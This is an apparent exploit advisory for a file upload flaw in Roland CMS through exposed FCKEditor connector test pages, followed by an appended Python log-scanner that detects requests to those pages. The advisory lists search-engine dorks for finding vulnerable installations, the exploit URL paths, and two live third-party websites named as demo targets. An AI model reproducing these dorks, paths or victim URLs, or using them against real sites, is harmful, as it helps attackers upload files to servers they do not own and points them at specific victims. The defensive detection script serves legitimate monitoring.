
Roland CMS File Upload Vulnerability (FCKEditor)

Author: Iran Cyber Security Group, Published: 08-06-2015
# Exploit Title : Roland CMS File Upload Vulnerability (FCKEditor)

# Date : 09/06/2015

# Exploit Author : Iran Cyber Security Group

# Discovered By : WH!T3 W01F

# Contact : whit3_w01f@att.net

# Software Link : www.schatzer.it

# Version : All Versions

# Category : Web Application Bugs

# Google Dork : intext:"Created by: Roland Schatzer Service"

# Bing Dork : "Created by: Roland Schatzer Service"

# Tested On : Windows

# Home : Iran-Cyber.Org

# PoC :

Exploit 1 : site.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/test.html

Exploit 2 : site.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/uploadtest.html

# Demo

http://www.gasthof-stern.com/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/uploadtest.html

http://www.schwarzenbach.it/webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/test.html

# Thanks To : root3r - KamraN HellisH - MOHAMAD-NOFOZI - Sheytan Azzam - JOK3R - CRYSIS BL4CK And All Members of Iran Cyber Security Group
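A defender-side check for the two connector test pages listed in the PoC section, added here as an example and not part of the original advisory: it scans web server access logs for requests to those pages and reports whether the server actually served them. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# The two FCKeditor connector test pages named in the advisory's PoC section.
SUFFIXES = (
    "/fckeditor/editor/filemanager/connectors/test.html",
    "/fckeditor/editor/filemanager/connectors/uploadtest.html",
)

# Assumed combined/common log format:
# ip - user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def normalize(target):
    """Canonicalize a request target so trivial variations still match."""
    path = unquote(target.split("?", 1)[0])   # drop query string, decode %xx
    path = path.replace("\\", "/").lower()    # Windows hosts ignore case
    return re.sub(r"/{2,}", "/", path)        # collapse duplicate slashes

def find_hits(lines):
    """Return (client, method, path, status, served) per matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = normalize(target)
        if path.endswith(SUFFIXES):
            # 2xx or 304 means the page exists on disk and was served,
            # so it should be deleted or blocked at the web server.
            served = status.startswith("2") or status == "304"
            hits.append((client, method, path, int(status), served))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [09/Jun/2015:10:01:02 +0000] "GET /webyep-system/programm/opt/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [09/Jun/2015:10:01:09 +0000] "GET /webyep-system/programm/opt/FCKeditor/editor/filemanager/connectors/upload%74est.html?x=1 HTTP/1.1" 404 210 "-" "-"',
    '203.0.113.5 - - [09/Jun/2015:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```

A hit with `served` set to `True` means the test page is still present in the deployed FCKeditor directory; a hit with a 404 shows probing against a host where the page has already been removed.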
